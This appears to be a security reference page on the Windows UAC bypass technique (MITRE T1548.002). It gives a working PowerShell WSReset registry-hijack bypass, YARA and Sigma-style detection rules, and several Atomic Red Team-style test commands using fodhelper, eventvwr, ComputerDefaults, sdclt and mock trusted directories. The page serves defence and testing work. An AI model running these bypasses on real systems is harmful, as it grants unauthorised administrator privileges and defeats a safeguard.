Bypass User Account Control

Created the Monday 05 October 2020. Updated 6 months, 2 weeks ago.

Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.

The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.

Technique Identifier

T1548.002

Technique Tags

Defense Evasion bypass UAC controls MITRE privilege elevation

Featured Windows API's

Below, you will find a list of the most commonly used Windows API's that are currently utilized by malware authors for current evasion technique. This list is meant to provide an overview of the API's that are commonly used for this purpose. If there are any API's that you feel should be included on this list, please do not hesitate to contact us. We will be happy to update the list and provide any additional information or documentation that may be helpful.

Sleep

Code Snippets

<#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API
.PARAMETER Command
Specifies the command you would like to run in high integrity context.
 
.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"
This will effectivly start cmd.exe in high integrity context.
.NOTES
This UAC bypass has been tested on the following:
 - Windows 10 Version 1803 OS Build 17134.590
 - Windows 10 Version 1809 OS Build 17763.316
#>
function Invoke-WSResetBypass {
      Param (
      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
      )
      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      New-Item $CommandPath -Force | Out-Null
      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
      Write-Host "[+] Registry entry has been created successfully!"
      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
      Write-Host "[+] Starting WSReset.exe"
      Write-Host "[+] Triggering payload.."
      Start-Sleep -Seconds 5
      if (Test-Path $filePath) {
      Remove-Item $filePath -Recurse -Force
      Write-Host "[+] Cleaning up registry entry"
      }
}

Detection Rules

                                    rule UNPROTECT_UAC_Bypass_Strings {
    meta:
        description = "Rule to detect UAC bypass attempt by regarding strings"
        author = "Thibault Seret"
        date = "2020-04-10"
    strings:
        $s1 = "SeIncreaseQuotaPrivilege" ascii fullword
        $s2 = "SeSecurityPrivilege" ascii fullword
        $s3 = "SeTakeOwnershipPrivilege" ascii fullword
        $s4 = "SeLoadDriverPrivilege" ascii fullword
        $s5 = "SeSystemProfilePrivilege" ascii fullword
        $s6 = "SeSystemtimePrivilege" ascii fullword
        $s7 = "SeProfileSingleProcessPrivilege" ascii fullword
        $s8 = "SeIncreaseBasePriorityPrivilege" ascii fullword
        $s9 = "SeCreatePagefilePrivilege" ascii fullword
        $s10 = "SeBackupPrivilege" ascii fullword
        $s11 = "SeRestorePrivilege" ascii fullword
        $s12 = "SeShutdownPrivilege" ascii fullword
        $s13 = "SeDebugPrivilege" ascii fullword
        $s14 = "SeSystemEnvironmentPrivilege" ascii fullword
        $s15 = "SeChangeNotifyPrivilege" ascii fullword
        $s16 = "SeRemoteShutdownPrivilege" ascii fullword
        $s17 = "SeUndockPrivilege" ascii fullword
        $s18 = "SeManageVolumePrivilege" ascii fullword
        $s19 = "SeImpersonatePrivilege" ascii fullword
        $s20 = "SeCreateGlobalPrivilege" ascii fullword
        $s21 = "SeIncreaseWorkingSetPrivilege" ascii fullword
        $s22 = "SeTimeZonePrivilege" ascii fullword
        $s23 = "SeCreateSymbolicLinkPrivilege" ascii fullword
    condition:
        5 of them
}

                                    title: Fodhelper UAC Bypass
status: experimental
description: Fodhelper UAC Bypass
author: Joe Security
date: 2020-07-30
id: 200082
threatname:
behaviorgroup: 26
classification: 7
mitreattack:

logsource:
      category: process_creation
      product: windows
detection:
      selection:      
          CommandLine:
              - '*reg add*hkcu\software\classes\ms-settings\shell\open\command*'
      condition: selection
level: critical
attack_technique: T1548.002
display_name: 'Abuse Elevation Control Mechanism: Bypass User Access Control'
atomic_tests:
- name: Bypass UAC using Event Viewer (cmd)
  auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9
  description: |
    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
    Upon execution command prompt should be launched with administrative privelages
  supported_platforms:
  - windows
  input_arguments:
    executable_binary:
      description: Binary to execute with UAC Bypass
      type: path
      default: C:\Windows\System32\cmd.exe
  executor:
    command: |
      reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
      cmd.exe /c eventvwr.msc
    cleanup_command: |
      reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
    name: command_prompt
- name: Bypass UAC using Event Viewer (PowerShell)
  auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
  description: |
    PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
    Upon execution command prompt should be launched with administrative privelages
  supported_platforms:
  - windows
  input_arguments:
    executable_binary:
      description: Binary to execute with UAC Bypass
      type: path
      default: C:\Windows\System32\cmd.exe
  executor:
    command: |
      New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
      Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
      Start-Process "C:\Windows\System32\eventvwr.msc"
    cleanup_command: |
      Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
    name: powershell
- name: Bypass UAC using Fodhelper
  auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
  description: |
    Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
    Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
  supported_platforms:
  - windows
  input_arguments:
    executable_binary:
      description: Binary to execute with UAC Bypass
      type: path
      default: C:\Windows\System32\cmd.exe
  executor:
    command: |
      reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
      reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
      fodhelper.exe
    cleanup_command: |
      reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
    name: command_prompt
- name: Bypass UAC using Fodhelper - PowerShell
  auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
  description: |
    PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
    Upon execution command prompt will be opened.
  supported_platforms:
  - windows
  input_arguments:
    executable_binary:
      description: Binary to execute with UAC Bypass
      type: path
      default: C:\Windows\System32\cmd.exe
  executor:
    command: |
      New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
      New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
      Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
      Start-Process "C:\Windows\System32\fodhelper.exe"
    cleanup_command: |
      Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
    name: powershell
- name: Bypass UAC using ComputerDefaults (PowerShell)
  auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
  description: |
    PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
    Upon execution administrative command prompt should open
  supported_platforms:
  - windows
  input_arguments:
    executable_binary:
      description: Binary to execute with UAC Bypass
      type: path
      default: C:\Windows\System32\cmd.exe
  executor:
    command: |
      New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
      New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
      Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
      Start-Process "C:\Windows\System32\ComputerDefaults.exe"
    cleanup_command: |
      Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Bypass UAC by Mocking Trusted Directories
  auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
  description: |
    Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
    Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch
  supported_platforms:
  - windows
  input_arguments:
    executable_binary:
      description: Binary to execute with UAC Bypass
      type: path
      default: C:\Windows\System32\cmd.exe
  executor:
    command: |
      mkdir "\\?\C:\Windows \System32\"
      copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
      mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
    cleanup_command: |
      rd "\\?\C:\Windows \" /S /Q >nul 2>nul
      del "c:\testbypass.exe" >nul 2>nul
    name: command_prompt
    elevation_required: true
- name: Bypass UAC using sdclt DelegateExecute
  auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7
  description: |
    Bypasses User Account Control using a fileless method, registry only. 
    Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
    [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
    Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
  supported_platforms:
  - windows
  input_arguments:
    command.to.execute:
      description: Command to execute
      type: string
      default: cmd.exe /c notepad.exe
  executor:
    command: |
      New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
      New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
      Start-Process -FilePath $env:windir\system32\sdclt.exe
      Start-Sleep -s 3
    cleanup_command: |
      Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
    name: powershell

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.

Abuse Elevation Control Mechanism: Bypass User Account Control, Sub-technique T1548.002 - Enterprise | MITRE ATT&CK®